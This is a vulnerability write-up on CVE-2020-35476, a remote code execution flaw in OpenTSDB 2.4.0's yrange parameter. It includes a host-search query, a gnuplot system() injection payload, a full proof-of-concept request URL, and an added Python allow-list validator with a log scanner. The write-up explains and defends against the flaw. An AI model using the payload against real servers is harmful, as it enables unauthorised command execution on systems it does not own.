
CVE-2020-35476 OpenTSDB 2.4.0 Remote Code Execution

A remote code execution vulnerability was found in the yrange parameter of OpenTSDB 2.4.0 and earlier (other parameters may also be affected).

fofa:title="Opentsdb" ||body="opentsdb_header.jpg"

In CVE-2018-12972, back-ticks were used for command injection (o=%60ls%60). The project introduced the following check to filter them; it can now be bypassed again.

```java
// TODO - far from perfect, should help a little.
if (given.contains("`") || given.contains("%60") ||
    given.contains("&#96;")) {
  throw new BadRequestException("Parameter " + param + " contained a "
      + "back-tick. That's a no-no.");
}
```

/src/tsd/GraphHandler.java:

```java
private static String popParam(final Map<String, List<String>> querystring,
                               final String param) {
  final List<String> params = querystring.remove(param);
  if (params == null) {
    return null;
  }
  final String given = params.get(params.size() - 1);
  // TODO - far from perfect, should help a little.
  if (given.contains("`") || given.contains("%60") ||
      given.contains("&#96;")) {
    throw new BadRequestException("Parameter " + param + " contained a "
        + "back-tick. That's a no-no.");
  }
  return given;
}
```

Bypass Payload:

[33:system('touch/tmp/poc.txt')]

PoC:

http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

The gnuplot script that OpenTSDB writes to the temp directory looks like this:

```gnuplot
set term png small size 1516,644
set xdata time
set timefmt "%s"
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right
set output "/tmp/d705ba5b.png"
set xrange ["972086400":"1603641404"]
set format x "%Y/%m/%d"
set grid
set style data linespoint
set key right box
set ylabel ""
set yrange [33:system('touch /tmp/poc.txt')]
plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}"
```

When OpenTSDB runs mygnuplot.sh, poc.txt is written to the temp directory.
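The root cause is that popParam() only blacklists three spellings of a back-tick while the value is spliced verbatim into a gnuplot script, where system() needs no back-tick at all. As an added example (Python, not OpenTSDB's code), the following contrasts that blacklist with an allow-list that accepts only a numeric gnuplot range, and scans constructed access-log lines (the IPs, timestamps and requests are made up) for /q requests whose yrange would not pass the allow-list.

```python
# Added example (not OpenTSDB's code): allow-list validation for the yrange
# parameter of the /q graph endpoint, contrasted with the back-tick blacklist
# in popParam() above, plus a scan over constructed access-log lines.
import re
from urllib.parse import urlsplit, parse_qs

# A gnuplot range is "[lo:hi]"; each bound is an optional signed number
# (empty means auto-scale). system('...'), back-ticks and their %60 / &#96;
# spellings all fail this pattern, so nothing else reaches the gnuplot script.
_NUM = r"-?(?:\d+(?:\.\d+)?|\.\d+)(?:[eE][+-]?\d+)?"
RANGE_RE = re.compile(rf"^\[({_NUM})?:({_NUM})?\]$")

# What the 2.4.0 blacklist refuses: three spellings of a back-tick, nothing more.
BLACKLIST = ("`", "%60", "&#96;")

def blacklist_allows(value: str) -> bool:
    """Mirror of the popParam() check; True means the value passes through."""
    return not any(tok in value for tok in BLACKLIST)

def is_valid_range(value: str) -> bool:
    """Allow-list check: True only for a well-formed numeric gnuplot range."""
    return RANGE_RE.fullmatch(value) is not None

def suspicious_requests(log_lines):
    """Return (line_no, yrange) for /q requests whose yrange is not a plain range."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m or not m.group(1).startswith("/q?"):
            continue
        qs = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for raw in qs.get("yrange", []):  # parse_qs already decodes %60 etc.
            if not is_valid_range(raw):
                hits.append((n, raw))
    return hits

# Constructed sample log lines (Combined Log Format): two benign requests,
# the page's PoC value, and a back-tick variant the old blacklist also catches.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Oct/2020:15:56:44 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=[0:100]&png HTTP/1.1" 200 5120',
    '10.0.0.5 - - [25/Oct/2020:15:57:01 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=[:2e3]&png HTTP/1.1" 200 5120',
    '10.0.0.9 - - [25/Oct/2020:15:58:12 +0000] "GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&yrange=[33:system(\'touch/tmp/poc.txt\')]&json HTTP/1.1" 200 210',
    '10.0.0.9 - - [25/Oct/2020:15:58:40 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=[0:%60ls%60]&json HTTP/1.1" 400 98',
]
```

The same RANGE_RE can be applied to any other parameter that GraphHandler splices into the gnuplot script, which is the fix the blacklist approach cannot provide.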

ref:

  • https://github.com/OpenTSDB/opentsdb/issues/2051
  • https://xz.aliyun.com/t/2511
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35476
  • https://forum.ywhack.com/thread-114835-1-2.html